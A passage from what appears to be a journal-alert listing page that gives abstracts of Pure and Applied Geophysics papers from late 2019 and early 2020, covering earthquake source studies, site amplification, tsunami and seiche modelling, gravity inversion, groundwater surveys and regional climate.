and seismic moment (M0) for seismogenic earthquakes (MW 5.5–7.1) in the Taiwan region was completed by using a teleseismic P-wave inversion method. Irrespective of the source self-similarity, the M0–τ relationship derived in this study had a power-law form, namely M0 ∝ τ3, under the assumption that ΔσVr3 is constant following a circular fault model (Δσ: static stress drop; Vr: rupture velocity). For Taiwan’s earthquakes, the derived M0–τ relationship not only provides information to predict the source duration of large earthquakes, but also probes the rupture features of seismogenic earthquakes. That is, there are different rupture patterns for earthquakes, but the product ΔσVr3 remains nearly constant. 更新日期:2020-01-27 • Pure Appl. Geophys. (IF 1.466) Pub Date : 2020-01-17 Francoise Courboulex, E. Diego Mercerat, Anne Deschamps, Sébastien Migeon, Marion Baques, Christophe Larroque, Diane Rivet, Yann Hello A broadband seismological station (PRIMA) installed offshore Nice airport (southeastern France) reveals a strong amplification effect of seismic waves. PRIMA station was in operation for 2 years (9/2016 to 10/2018) on the outer shelf at a water depth of 18 m. Situated at the mouth of the Var River, this zone is unstable and prone to landslides. A catastrophic landslide and tsunami already occurred in 1979, causing 10 casualties. Given the level of seismicity of the area, it is important to infer the impact of an earthquake on this zone. We analyze the recordings of earthquakes and seismic noise at the PRIMA station by comparing them to nearby inland stations. We find that the seismic waves are strongly amplified at PRIMA at some specific frequencies (with an amplification factor greater than 10 at 0.9 Hz). Using geological and geophysical data, we show that the main amplification frequency peak (at 0.9 Hz) is due to the velocity contrast between the Pliocene sedimentary layer and fine-grained sediments dated from the Holocene, at about 100 m depth. This velocity contrast is also present along the Var valley, but the level of amplification detected on PRIMA station is larger. Using numerical simulations of seismic waves in a 2D model that accounts for the pinch-out geometry related to the termination of the Holocene sedimentary layer, we can partially explain this amplification. This offshore site effect could have a crucial impact on the triggering of a submarine landslide by an earthquake in this region. More generally, this effect should be taken into account for the modeling of landslides and induced tsunamis triggered by seismic waves. 更新日期:2020-01-17 • Pure Appl. Geophys. (IF 1.466) Pub Date : 2020-01-17 Xuliang Feng, Shengrong Liu, Ruikun Guo, Pengfei Wang, Jinai Zhang Depicting the basement relief of a sedimentary basin with gravity data is vital to predicting the hydrocarbon potential of a sedimentary basin and guiding exploration work. We have developed a gravity inversion method to estimate the depth to a blocky basement of a sedimentary basin. The basement rocks are assumed to be homogeneous and have uniform density, while the density of the sediment over the basement increases exponentially with depth. The density contrast between the sediment and the basement at the surface varies horizontally. The decay factor of density contrast is also nonuniform. The sediment above the basement is divided into vertically juxtaposed prisms, and the depth of the bottom of each prism represents the depth to the basement and is the parameter to be estimated. The L0 norm is introduced to limit the gradient of the parameter vector to obtain the model constraint function. We then establish the objective function for inversion by combining the gravity data misfit function, the known depth constraint function, and the model constraint function. The inversion is performed by minimizing the objective function using the nonlinear conjugate gradient algorithm. The inversion method is evaluated using a 2D and a 3D sedimentary basin model. The results show that our proposed method is capable of delineating the blocky basement relief of a sedimentary basin, and the result is sharper than that obtained using the L1 norm constraint. The method is applied to real data from the western part of the Zhu 1 depression in the Pearl River Mouth Basin, northern South China Sea. The solution reveals a strongly faulted basement, which is in accordance with the known tectonic information indicating the basin is a fully developed graben. 更新日期:2020-01-17 • Pure Appl. Geophys. (IF 1.466) Pub Date : 2020-01-17 Kaya M. Wilson, Hannah E. Power Tsunami modelling is widely used to estimate the potential impacts of tsunamis. Models require a tide input, which can be either static, representing a specific tide level, such as Highest Astronomic Tide or dynamic, which represents a moving tide level. Although commonly used, static tide inputs do not account for tsunami–tide interactions, which are known to be non-linear and more significant in estuaries when compared to the open coast. To demonstrate the differences between tsunami models using static or dynamic tide inputs, a series of models were carried out for two New South Wales estuaries, Sydney harbour and port hacking. Model boundary conditions phased a MW 9.0 Puysegur source tsunami with multiple tide scenarios. Fourteen distinct scenarios with dynamic tides were created by phasing the largest tsunami wave peak at regular intervals across the tidal range. For comparison, static tide models were run using equivalent tide levels. The situations where static tide models provide results comparable or more conservative than dynamic tide models are for the first 1–2 h after tsunami arrival, at high tides, and when compared to dynamic falling tides at the same tide level. Differences are most apparent upriver of geomorphological constrictions. The effects of geomorphological constrictions were further examined using idealised model setups with a constriction variable. Results show that constrictions affect downriver maximum water levels, tsunami wave heights, upriver water accumulation and inundation maxima and distributions. These results have implications for estuaries vulnerable to erosion at constriction sites during a tsunami event. 更新日期:2020-01-17 • Pure Appl. Geophys. (IF 1.466) Pub Date : 2020-01-17 D. T. Pugh, P. L. Woodworth, E. M. S. Wijeratne Abstract Sea level records have been obtained from a dozen tide gauges deployed around the Shetland Islands, and the high-frequency components of each record have been analysed to determine how the amplitudes and periods of seiches vary from place to place. We have found that seiches occur almost everywhere, although with different periods at different locations, and sometimes with amplitudes exceeding several decimetres. Spectral analysis shows that two or more modes of seiching are present at some sites. The study attempts to explain, with the help of a numerical model, why seiches with particular periods are observed at each location, and what forcings are responsible for them. In particular, we have revisited an earlier study of seiches on the east coast of Shetland by Cartwright and Young (Proc R Soc Lond A 338:111–128, 1974) and find no evidence to support the theory that they proposed for their generation. In addition, we have investigated how often and why the largest seiche events occur at Lerwick (with trough-to-crest wave heights of about 1 m), taking advantage of its long sea level record. Seiches (and other types of high-frequency sea level variability) are often ignored in studies of sea level changes and their coastal impacts. And yet they can be large enough to contribute significantly to the extreme sea levels that have major impacts on the coast. Therefore, our Shetland research serves as a case study of the need to have a fuller understanding of the climatology of seiches for the whole world coastline. 更新日期:2020-01-17 • Pure Appl. Geophys. (IF 1.466) Pub Date : 2020-01-17 Evangelos Mouzakiotis, Vassilios Karastathis, Nikolaos Voulgaris, Panagiotis Papadimitriou Elastic 3D wave-field simulations were performed in the seismically active region of Eastern Gulf of Corinth, in the area of Loutraki city. A new methodology was tested with the aim of performing multiple simulations for a large variety of realistic sources located around the study area, by employing 3D finite-difference modeling using matrix operations for the calculation of the spatial velocity and stress derivatives. The new methodology was proven to be quite efficient in simulating the near surface 3D site effect of the study area, by greatly minimizing the simulation time, thus allowing the use of 3D finite-difference modeling for a large number of simulations. The complex geological features of the study area were obtained by performing multiple passive MASW surveys within the busy urban area of Loutraki. By processing the acquired geophysical data, a highly inhomogeneous near surface velocity structure in the study area was obtained and was implemented in the 3D wave-field simulations. The near surface amplification that is caused by the 3D subsurface structure was proven to be highly significant for the area of Loutraki, with high spectral amplification compared to the amplification that is caused by an equivalent 1D model in the area. The dominant frequencies of the spectral amplification for the 3D model were also confirmed by Processing HVSR measurements that were also taken in the area. Finally, we also investigated how the propagation direction affects the near surface amplification. 更新日期:2020-01-17 • Pure Appl. Geophys. (IF 1.466) Pub Date : 2020-01-15 Jon B. Fletcher, John Boatwright Abstract Power spectra of shear-waves for eighteen earthquakes from the Anza-Imperial Valley region were inverted for source, mid-path Q, site attenuation and site response. The motivation was whether differences in site attenuation (parameterized as t*, r/cQ, where r is distance along ray path near the site, c is shear velocity and Q is the quality factor that parameterizes attenuation) and site response could be correlated with residuals in peak values of velocity or acceleration after removing the affect of distance-dependent attenuation. We decomposed spectra of S-waves from horizontal components of 18 earthquakes from 2010 to 2018 into a common source for each event with ω−2 spectral fall-off at high frequencies and then projected the residuals onto path and site terms following the methodology of Boatwright et al. (Bull Seismol Soc Am 81:1754–1782, 1991). The site terms were constrained to have an amplification at a particular frequency governed by VS30 at two of the sites which had downhole shear-wave logs. The 18 events, 3 < M < 4, had moments between approximately 1020 and 1022 dyne-cm, and stress drops between 1 and 100 bars. Average mid-crust attenuation had a Q of 844 reflecting the average path through the crystalline rock of the San Jacinto Mountains. t* for each station corresponded to the geologic environment such that stations on hard rock had low t* (e.g. stations KNW, PFO and RDM) a station in the San Jacinto fault zone (station SND) had a moderate t* of 0.035 s and stations in the Imperial Valley usually had higher t*s. Generally t* correlated with average amplification suggesting that sites characterized by low surface velocities and higher attenuation also have more amplification in the 1–6 Hz band. Residuals of peak values were determined by subtracting the prediction of Boore and Atkinson (2008). There is a correlation between average amplification and peak velocity, but not peak acceleration. Interestingly, there is less scatter at high values of amplification although there is also less data. Scatter in values of peak velocity and peak acceleration are higher at shorter compared to longer durations. When using a frequency-dependent form for Q, variances are higher, sometimes much higher; the dataset does not support frequency-dependent Q, which is not similar to results from the Imperial Valley and northeastern North America. 更新日期:2020-01-15 • Pure Appl. Geophys. (IF 1.466) Pub Date : 2020-01-15 C. Pro, E. Buforn, A. Udías, J. Borges, C. S. Oliveira The 28 February 1969 (Ms 8.0) Cape St. Vincent earthquake is the largest shock to have occurred in the region after the Lisbon earthquake of 1755. However, the study of the rupture process has been limited due to the characteristics of the available seismic data which were analogue records that were generally saturated at both regional and teleseismic distances. Indeed, these data consist of just one accelerograph record at the 25th April Bridge in Lisbon (Portugal) and the observed intensities in the Iberian Peninsula and northern part of Morocco. We have used these data to simulate the distribution of PGV (Peak Ground Velocity) for the 1969 event at regional distances (less than 600 km) by using a 3D velocity model. The PGV values are very important in seismic hazard studies. The velocity model and the methodological approach were tested by comparing synthetic and observed ground velocities at regional distances for two recent, well-studied earthquakes that occurred in this region, namely, the 2007 (Mw = 5.9) and the 2009 (Mw = 5.5) earthquakes. By comparing the synthetic and observed PGA (Peak Ground Acceleration) at Lisbon, the focal depth was estimated equal to 25 km and the seismic moment equal to 6.4 × 1020 N m (Mw = 7.8) for 1969 earthquake. With these parameters, PGV values were obtained for 159 sites located in the Iberian Peninsula and northern region of Morocco where we have felt intensity values. Using different empirical relations, the instrumental intensity values were calculated and compared with the felt intensities. As a result, the synthetic PGV values obtained in this study for the 1969 earthquake could be used as reference values, and the methodological approach would allow the PGV and intensity to be simulated for other events in the region. 更新日期:2020-01-15 • Pure Appl. Geophys. (IF 1.466) Pub Date : 2020-01-15 Yanjun Dong, Fanxi Liao, Dongzhen Wang, Chengchen Du, Kai He Here, we show the present-day tectonic stress field and regional GPS velocity and strain rate fields in Hubei Province, central China. Our results are calculated based on the digital observation data from 01 January 2010, to 31 December 2017, by using the seis-CAP, P-wave first motion, and grid search methods and the software GAMIT/GLOBK10.4. The results show that the P axis azimuths of focal mechanism solutions, the principal compressional stress field, and the regional velocity and strain rate fields are conformably compressional in a NW–SE direction. The regional stress shape ratio R values are relatively low, and the faults are dominantly compressive-shear or compresso-shear faults. The average velocity modulus value for the GPS observation stations in western Hubei is 6.1 mm/a, which is higher than that in eastern Hubei (5.4 mm/a). The average velocity modulus value in the Jianghan Basin interior is relatively low (4.4 mm/a), while that in the northwestern Jianghan Basin is higher (7.6 mm/a). The strain rate field is characterized by NW–SE compression accompanied by NE–SW tension. The results suggest that the present-day crustal movement in Hubei Province is mainly controlled by collisions with the Indian Plate in the west and the Philippine Plate in the east and the consequent crustal shortening induced by western Hubei wedging into the Jianghan Basin. Further, the resistance by the thrust-and-fold belt in eastern Hubei contributes to the principal compressional movement in the study area. The T axis azimuth of focal mechanism solutions is consistent with the principal extensional stress field direction. In the central and northern Jianghan Basin, the R values are relatively high, the faults are mainly transtensional, and the crustal deformation is mainly extensional, which may be affected by the denudation, thinning and rapid rebound of the Dabie Orogen, resulting in tectonic extrusion and flow in the Jianghan Basin to both the NE and SW sides. 更新日期:2020-01-15 • Pure Appl. Geophys. (IF 1.466) Pub Date : 2020-01-15 Aleksandar Valjarević, Dejan Filipović, Miško Milanović, Dragana Valjarević Sea surface salinity presents one of the most important chemical elements in the water. Climatic variables, included in new view of salinity distribution at a global scale, were used in this research. For the purpose of this research newly updated climate parameters for the period until 2100 were used along with (CMIP5) climatological model. The new distribution of surface salinity may show water desalination and energy potential. This map can be useful in the determination of new littoral areas or for fishermen’s routes. These data are presented in geo-tiff raster extension with the resolution of 0.1. This map could be updated with climatological parameters with obtained medium climate change effects. Some places in the world sea have low, some have high salinity. Salinity increases in accordance with the increase of precipitation and decreases with the decrease of it. The paper presents following maps; salinity world map when there is no climate change; the moderate one, if the temperature increases for 2.0 °C until 2100, and high if the increase of temperature was between 2.0 °C and 5.0 °C. The three scenarios were taken to show updated maps of world salinity in comparison with climate change effects. 更新日期:2020-01-15 • Pure Appl. Geophys. (IF 1.466) Pub Date : 2020-01-15 Usha Devi, M. S. Shekhar, G. P. Singh, S. K. Dash Abstract Dynamical and Statistical models are operationally used by Snow and Avalanche Study Establishment (SASE) for winter precipitation forecasting over the Northwest Himalayas (NWH). In this paper, a statistical regression model developed for seasonal (December–April) precipitation forecast over Northwest Himalaya is discussed. After carrying out the analysis of various atmospheric parameters that affect the winter precipitation over the NWH two parameters are selected such as North Atlantic Oscillation (NAO) and Outgoing Long wave Radiation (OLR) over specific areas of North Atlantic Ocean for the development of statistical regression model. A set of 27 years (1990–1991 to 2016–2017) of observed precipitation data and parameters (NAO and OLR) are utilized. Out of 27 years of data, first 20 years (1990–1991 to 2009–2010) are used for the development of regression model and remaining 7 years (2010–2011 to 2016–2017) are used for the validation purpose. Precipitation over NWH mainly associated with Western Disturbances (WDs) and the results of the present study reveal that NAO during SON has negative relationship with WDs and also with the winter precipitation over same region. Quantitative validation of the multiple regression model, result shows good Skill Score and RMSE-observations standard deviation ratio (RSR) which is 0.79 and 0.45 respectively and BIAS − 0.92. 更新日期:2020-01-15 • Pure Appl. Geophys. (IF 1.466) Pub Date : 2020-01-15 Chong Liu, LiZhen Cheng, Xueping Dai, Mamadou Cherif Diallo The long-term sustainable development of mineral exploration under covers require effective deep detection techniques and methods. Start from enhancing the surface-borehole time-domain electromagnetic (TEM) technique, the present study established a new relationship between the pulse width (Δ), the target time constant (τ) and the measurement time (t). Under certain conditions, the new formula has been extended to all TEM systems that use square or trapezoidal waveforms. A series of numerical simulations illustrate the consistent behaviors of the surface-borehole, ground and airborne TEM fields. The new relationship allows us to evaluate optimal pulse widths for different off-times and to help TEM survey design. 更新日期:2020-01-15 • Pure Appl. Geophys. (IF 1.466) Pub Date : 2020-01-15 Abstract The investigated region is located in the western desert fringes of the Nile Valley which requires studies of groundwater related to the many projects of land reclamation. The key objective of this paper is to estimate the qualitative and geometrical features of the investigated aquifer. Using 60 vertical electrical sounding and time-domain electromagnetic soundings allows us to suggest one possible model of the geometrical features of the local aquifer. A hydrogeological monitoring has been undertaken to investigate the current groundwater situation at the Gallaba plain. Such hydrological monitoring has not been undertaken before in detail. The results show that the investigated region has high groundwater potentialities in two main aquifers which belong to Pleistocene: shallow fresh water and deep brackish water. The lithological and structural elements contribute mainly to recharge and store the groundwater in the western part of the River Nile in Kom Ombo graben. The geochemical properties of the groundwater of the studied aquifers reflect meteoric water, which is a fresh to slightly brackish water. The small amount of groundwater salinity arises from silicate weathering and evaporation processes occurring in the aquifer matrix. Moreover, most of the studied groundwater samples are unfit for human consumption. Such samples are very satisfactory for livestock and poultry purposes and they can be used for irrigation using modern and improved irrigation methods e.g. sprinkler and drip methods. Furthermore, the hydrogeological monitoring of the concerned area indicates that it has high groundwater potentialities which will support its sustainable development. 更新日期:2020-01-15 • Pure Appl. Geophys. (IF 1.466) Pub Date : 2020-01-15 Ling Zhang, Bin Hu, Zhuo Jia, Yi Xu Abstract The Lunar penetrating radar (LPR) carried by Chang’E-3 (CE-3) mission is an important application of radar in lunar exploration. An opportunity of significance to detect the information of regolith and the subsurface structure on the landing site is offered by LPR aboard the Yutu rover. On the basis of a data processing flow, a low-frequency radar image has been available for mapping subsurface structure. The noise interfered data give a huge challenge for geological stratification and interpretation. To solve the limitation imposed by noise, we adopt the shearlet transform as a promising tool for data analysis and noise attenuation. The different distributions of the noise and signal in the shearlet domain decrease the difficulty of noise attenuation. To optimize the denosing strategy, we replace a local adaptive thresholding function with the conventional hard threshold. The quality of the processed data is improved, which is helpful for geological stratification and interpretation. Finally, by combining these data with the regional geology and previous research, especially the LPR data, we can provide an interpretation of the LPR CH-1. 更新日期:2020-01-15 • Pure Appl. Geophys. (IF 1.466) Pub Date : 2020-01-15 Jiayuan Huang, Robert L. Nowack Machine learning using convolutional neural networks (CNNs) is investigated for the imaging of sparsely sampled seismic reflection data. A limitation of traditional imaging methods is that they often require seismic data with sufficient spatial sampling. Using CNNs for imaging, even if the spatial sampling of the data is sparse, good imaging results can still be obtained. Therefore, CNNs applied to seismic imaging have the potential of producing improved imaging results when spatial sampling of the data is sparse. The imaged model can then be used to generate more densely sampled data and in this way be used to interpolate either regularly or irregularly sampled data. Although there are many approaches for the interpolation of seismic data, here seismic imaging is performed directly with sparse seismic data once the CNN model has been trained. The CNN model is found to be relatively robust to small variations from the training dataset. For greater deviations, a larger training dataset would likely be required. If the CNN is trained with a sufficient amount of data, it has the potential of imaging more complex seismic profiles. 更新日期:2020-01-15 • Pure Appl. Geophys. (IF 1.466) Pub Date : 2020-01-08 Hakki Baltaci This study investigates the atmospheric mechanisms triggering flash-flood event in Thrace Basin of Turkey on November 27, 2018. Underestimation of this extreme precipitation amounts by NWP global and regional models (i.e. ECMWF, ALARO, WRF) and other meteorological difficulties (i.e. complex topography, land-sea interactions) in weather forecasting disabled disaster risk reduction before the event occurred. Detailed synoptic, thermodynamic, in-situ, and remote sensing analyzing results showed that significant amount of moisture during the afternoon times of the day was transferred to the atmosphere (from ground to 300-hPa) as a consequence of the excessive heating of sea surface temperatures (SSTs) of the Aegean Sea (16.5 °C in Ayvacik-Gulpinar place, 0.9 °C above its long-term normals). Strong southwesterly wind speeds associated with slow meridional movement of mid-latitude cyclone from its origin to the Eastern Mediterranean (EM) enabled transferring of relatively warm moist air to the land areas of Thrace Region (> 300 km fetch distance). Strong updraft and instability conditions under developed a supercell resulted with lightning (totally 63 cloud-to-ground and 59 intra cloud) and heavy rainfall especially Suloglu, Kofcaz, and Edirne settlements with the 12-hour total amounts 160.0, 123.0, and 97.4 mm (rainfall return period ~ 100 years), respectively. Flash-flood event caused numerous injuries and the death of a person and damaged, automobiles, houses, crops, and infrastructure of the Edirne and its neighboring settlements. From Showalter, K, Total of Totals, SWEAT, and CAPE instability indices; SWEAT is most appropriate to represent high possibility of occurrence of severe thunderstorms over the Edirne province owing to low-level moisture, warm air advection and low and mid-level wind speed terms in its equation. 更新日期:2020-01-08 • Pure Appl. Geophys. (IF 1.466) Pub Date : 2020-01-08 Dongyong Zhou, Xingyao Yin, Zhaoyun Zong Abstract A porous medium is composed of a rock skeleton and pore fluids, and seismic wave propagation in it will produce complex and diverse variations influenced by pores and fluids filling. It is very important to carry out the study of closed-form expressions of the plane-wave reflection and transmission coefficients at a planar interface between porous media for analyzing the properties of pores and its fluids and eventually revealing underground oil-bearing reservoirs. In this paper, based on the relationships among seismic wave functions, displacements and stresses in porous media, an exact equation of plane-wave reflection and transmission coefficients with a normal incident fast P-wave is first derived. Considering the characteristics of the parameters in a coefficient matrix of an exact equation, the closed-form expressions with clear geophysical meaning are further derived, which include three parts, the rock skeleton term, the fluid–solid coupling term and the pore fluid term. Through the establishment of two porous media models, the influence of each term in the approximate expression on the reflection characteristics of a fast P-wave is analyzed. Different approximate expressions of the reflection coefficient of a fast P-wave can be selected for oil and gas prediction of different reservoirs, which lays a foundation for the identification of gas, oil and brine. 更新日期:2020-01-08 • Pure Appl. Geophys. (IF 1.466) Pub Date : 2020-01-08 Zhencong Zhao, Jingyi Chen, Xiaobo Liu Seismic numerical modeling in the presence of surface topography has become a valuable tool to characterize seismic wave propagation in basin or mountain areas. Regarding advantages of frequency-domain seismic wavefield simulations (e.g., easy implementation of multiple sources and straightforward extension of adding attenuation factors), we propose a frequency-domain finite-difference seismic wavefield simulation in 2D elastic media with an irregular free surface. In the frequency domain, we first transform second-order elastic wave equations and first-order free surface boundary conditions from the Cartesian coordinate system to the curvilinear coordinate system. Then we apply complex frequency-shifted perfectly matched layer (CFS-PML) absorbing boundary condition to second-order elastic wave equations in the curvilinear coordinate. To better couple free surface boundary conditions and CFS-PML absorbing boundary condition, we also apply the complex coordinate stretching method used in CFS-PML to free surface boundary conditions in the curvilinear coordinate. In the first numerical test, the comparison of the seismograms calculated by our algorithm with an analytical solution indicates that our algorithm can accurately simulate seismic wavefield in the frequency domain. Finally, we choose three more elastic models with different types of surface topographies to further characterize seismic wave propagation. 更新日期:2020-01-08 • Pure Appl. Geophys. (IF 1.466) Pub Date : 2020-01-08 Baohui Men, Zhijian Wu, Huanlong Liu, Wei Tian, Yong Zhao Climate change have a profound impact on the production and life of the people in the Beijing–Tianjin–Hebei region. Precipitation and temperature are regarded as two basic components of climate. This study investigated the spatial and temporal characteristics of precipitation and temperature over the region from 1960 to 2013. Different methods were used to analyze temporal variation and the results are mutually verified. Wavelet analysis was adopted to analyze the abrupt changes of precipitation and temperature. Empirical orthogonal function decomposition method was utilized to analyze the spatial distribution of temperature and precipitation. The study yielded three major findings: First, the inter-annual decrease and increase of precipitation appeared alternately in the region. Temperature was rising significantly in the last 50 years, apart from a slow reduction in the late 1970s. Second, the spatial distribution characteristics of precipitation vary due to the distance from the ocean. The increasing trend of temperature in Beijing-centered region was more obvious than that in areas away from the sea. Third, precipitation and temperature show strong correlations in change. When temperature increased, the rainfall decreased. What is more, when the temperature mutated, the precipitation also changed rapidly. The results can guide local agriculture production and provide reference for the further study of climate change. 更新日期:2020-01-08 • Pure Appl. Geophys. (IF 1.466) Pub Date : 2020-01-08 Akram Aziz, Tamer Attia, Mahmoud Hanafi 更新日期:2020-01-08 • Pure Appl. Geophys. (IF 1.466) Pub Date : 2020-01-08 Zhu Zhang, Kenneth G. Dueker The transition zone water filter model (Nature 425(6953), 39–44; 2003) predicts that a hydrous partial melt layer is only actively produced in a region of upwelling mantle. We test the transition zone water filter model via stacking of P-to-S converted receiver functions by using the IRIS-PASSCAL RISTRA (Colorado Plateau/Rio Grande Rift Seismic Transect Experiment) array. Assuming the high velocity regions found at the northwest and southeast ends of the array at 350–440 km by teleseismic velocity tomograms e.g. Schmandt and Humphreys (Earth and Planetary Science Letters 297(3–4): 435–445; 2010) are cold and sinking vertically, the 410-km low velocity layer should be absent in these regions. The receiver function stacking profiles find the mean depths of the two primary discontinuities at 417 ± 7.1 km for the 410-km discontinuity and 667 ± 8.2 km for the 660-km discontinuity. The average arrival amplitudes with respect to Z component are 3.0% for the 410-km discontinuity, 2.8% for the 660-km discontinuity, and − 1.8% for the 410-km low velocity layer. The stacked Pds image show the 410-km low cabsent at ~ 350 to 390 km in the high velocity regions, but present in low velocity region. A correlation plot of sum of the 410-km low velocity arrival amplitudes and P-wave perturbation finds a positive linear relationship. Therefore, our findings provide seismic evidence for the transition zone water filter model at a small scale. 更新日期:2020-01-08 • Pure Appl. Geophys. (IF 1.466) Pub Date : 2020-01-08 Fuqiang Shi, Shaoyang Li, Marcos Moreno Abstract Crustal faults at subduction zones show evidence of activity over geological time, but at the scale of earthquake cycle the mechanical behavior of these faults is not fully understood. Here we construct 2-D viscoelastic models constrained by both horizontal and vertical GPS-derived interseismic velocities to investigate the contribution and interrelation between subduction zone locking, viscous mantle flow, and upper plate faulting on surface deformation in Central Andes. Main pattern of horizontal velocities can be explained by a combination of locking degree and viscous flow, whereas vertical signal is found essential for estimating the locking depth. A sharp deformation gradient near the major back-arc fault suggests an active interseismic shorting across this structure. We further conduct mechanical viscoelastic models with a frictional back-arc fault to analyze its displacement and activation conditions. Our results suggest that the back-arc fault is creeping at ~ 3 mm/year and its motion is mainly driven by the interseismic viscous mantle flow, which spreads plate tectonic stresses broadly across the continent. Moreover, the frictional strength of the back-arc fault must be remarkably weak and its mechanics re-distributes the interseismic deformation and shortens the continental plate in Central Andes. Geological estimates suggest that the long-term shortening rate at the back-arc fault is ~ 10 mm/year, suggesting that this structure can accumulate ~ 7 mm/year of slip deficit, confirming the seismic potential of this structure. 更新日期:2020-01-08 • Pure Appl. Geophys. (IF 1.466) Pub Date : 2020-01-03 This study uses ground penetrating radar (GPR) data as constraints in the inversion of radio-magnetotelluric (RMT) data, to provide an improved model at shallow depth. We show that modification of the model regularization matrix using all GPR common-offset (CO) reflections can mislead the constrained inversion of RMT data. To avoid such problems, common mid-point (CMP) GPR data are translated to a resistivity model by introducing a new petrophysical relationship based on a combination of Topp’s and Archie’s equations. This model is updated through a semi-iterative method and is employed as an initial and prior model in the subsequent inversion of RMT data. Finally, a water content model that fits the GPR CMP and RMT data is derived from the resistivity model computed by the constrained inversion of RMT data. To assess the proposed scheme, it is applied to a synthetic data set. Then, real RMT data collected along an 870 m-long profile across a known aquifer situated in the north of Heby, central Sweden, are inverted. By removing the smoothness constraints across GPR CO interfaces or using CMP-based inversion, thick (> 10 m) vadose and saturated zones are resolved and shown to correlate with logs from nearby boreholes. Nevertheless, the application of our CMP-based inversion was the only efficient scheme to retrieve thin (~ 3 m) saturated zones and the water table at a depth of 7–15 m in the RMT models. The estimated models of water content are in good agreement with the available hydrogeological information in the study area. 更新日期:2020-01-04 • Pure Appl. Geophys. (IF 1.466) Pub Date : 2019-12-23 Xiaolei Tu, Michael S. Zhdanov Potential field migration represents a rapid technique for imaging the subsurface based on gravity data. However, migration transformation usually produces a smooth and unfocused image of the targets due to the diffusive nature of the potential fields. In this paper, we introduce a method of the migration image enhancement and sharpening based on the application of the hybrid focusing stabilizer, which combines the edge-preserving smoothing filter with the minimum support functional. The method is based on the model resolution matrix of the migration operator. We also improve the migration image with a novel target-oriented migration method. The developed method of migration image enhancement and sharpening is illustrated by synthetic model studies and case studies. The case study involves imaging the full tensor gravity gradient data collected in the Nordkapp Basin of the Barents Sea. 更新日期:2020-01-04 • Pure Appl. Geophys. (IF 1.466) Pub Date : 2019-12-20 Mohamed Hamdache, José A. Peláez Abstract We would like to make some comments on the paper by Hamidatou et al. (2019). Initially, these comments are motivated to reveal that, previous results on probabilistic seismic hazard analyses, some of them computed and published by our research group, are wrongly quoted in the paper by these authors. In our opinion, some other points are worthy of debate, mainly, but not only, the used seismic source zone model, the used logic-tree, and also the comparison of estimated values of peak ground horizontal acceleration (PGA) with previous results. 更新日期:2020-01-04 • Pure Appl. Geophys. (IF 1.466) Pub Date : 2019-12-20 Alexandre Paris, Philippe Heinrich, Raphaël Paris, Stéphane Abadie On the evening of December 22, 2018, the coasts of the Sunda Strait, Indonesia, were hit by a tsunami generated by the collapse of a part of the Anak Krakatau volcano. Hundreds of people were killed, thousands were injured and displaced. This paper presents a preliminary modeling of the volcano flank collapse and the tsunami generated based on the results of a 2D depth-averaged coupled model involving a granular rheology and a Coulomb friction for the slide description and dispersive effects for the water flow part. With a reconstructed total volume (subaerial and submarine) of the landslide of 150 million $$\hbox {m}^{3}$$ inferred from pre and post-collapse satellite and aerial images, the comparison of the simulated water waves with the observations (tide gauges located all around the strait, photographs and field surveys) is satisfactory. Due to the lack of information for the submarine part of the landslide, the reconstructed submarine slope is assumed to be approximately constant. A significant time delay on the results and particularly in the Bandar Lampung Bay could be attributed to imprecisions of bathymetric data. The sensitivity to the basal friction and to dispersive effects is analyzed through numerical tests. Results show that the influence of the basal friction angle on the simulated wave heights decreases with distance and that a value of $$2^{\circ }$$ gives consistent results with the observations. The dispersive effects are assessed by comparing water waves simulated by a shallow water model and a Boussinesq model. Simulations with frequency dispersion produce longer wave periods and smaller wave amplitudes in the Sunda Strait and particularly in deep waters. 更新日期:2020-01-04 • Pure Appl. Geophys. (IF 1.466) Pub Date : 2019-12-20 C. H. Lin, Y. C. Lai, M. H. Shih, C. J. Lin, J. S. Ku, Y. C. Huang A dense linear geophone array is deployed across the Tatun volcano group (TVG) at the northern tip of Taiwan, where more than 7 million residents live in the Taipei metropolis. The array is composed of 50 geophones with a station spacing of ~ 200 m in average, and it is designed for striking in the NW–SE direction to record the many earthquakes in eastern Taiwan, where the Philippine Sea plate subducted beneath the Eurasia plate. The detailed examination of felt earthquakes shows consistent P-wave delays are recorded at particular stations of the array. The further forward modeling indicates there is a low-velocity zone (LVZ) at depths between ~ 0.5 and ~ 2.5 km beneath the major fumarole sites. Combining this preliminary result with previous studies including clustering seismicity, volcanic earthquakes, low-resistivity zone, strong degassing processes and shallow velocity structures, we suggest that the LVZ might be associated with the major hydrothermal reservoir at the TVG. The identification of the hydrothermal reservoir by the LVZ not only implies a potential volcanic threat, such as phreatic eruptions, in the future, but also provides the possibility of sustainable geothermal resources for replacing traditional nuclear and fossil fuel power plants. Detailed images of the LVZ and other volcanic structures will be obtained soon when dense geophone arrays with more than 600 geophones are deployed from 2020 to 2022. 更新日期:2020-01-04 • Pure Appl. Geophys. (IF 1.466) Pub Date : 2019-12-18 Alessandro Longo, Stefano Bianchi, Wolfango Plastino, Bartosz Idźkowski, Maciej Suchiński, Tomasz Bulik Abstract The local Hurst exponent H(t) has been computed for an array of 38 seismometers, deployed at the Virgo West End Building for Newtonian Noise characterisation purposes. The analysed period is from January 31st, 2018 to February 5th, 2018. The Hurst exponent H is a fractal index quantifying the persistent behaviour of a time series, higher H corresponding to higher persistency. The adopted methodology makes use of the local Hurst exponent computed using small sliding windows, in order to characterise the properties of the seismometers. Hourly averages and averages of H(t) have been computed over the whole analysed period. Results show that seismometers placed on a concrete slab closer to the centre of the room systematically exhibit higher persistency than the ones that are not placed on it. Seismometers placed next to the outer walls also exhibit higher persistency. The seismometer placed on a thin metal plate exhibits instead very low values of persistency during the analysed period, compared to the rest of the array. 更新日期:2020-01-04 • Pure Appl. Geophys. (IF 1.466) Pub Date : 2019-12-18 Dewan Mohammad Enamul Haque, Nawar Wadud Khan, Md. Selim, A. S. M. Maksud Kamal, Sara Hanan Chowdhury Abstract This study aims to build on the existing knowledge and improve the overall PSHA results by modifying source, path and site characteristics for Bangladesh. Firstly, six potential seismotectonic zones have been re-defined based on the recent study of Wang et al. (J Geophys Res Solid Earth 119:3576–3822, 2014) and Nath and Thingbaijam (J Seismol 15(2):295–315, 2011), and the updated earthquake catalogue has been declustered using two methods. Important source parameters, such as recurrence b-values and maximum magnitudes, have been determined using the Maximum Likelihood and cumulative moment methods, respectively, and their uncertainties have been addressed using a logic-tree approach. Secondly, based on literature review and studies in neighboring countries, suitable GMPEs have been selected for the seismic zones and the uncertainties have been addressed using a logic tree approach. A significant novelty of the study lies in the consideration of the site effects by integrating Vs30 values throughout the country. The 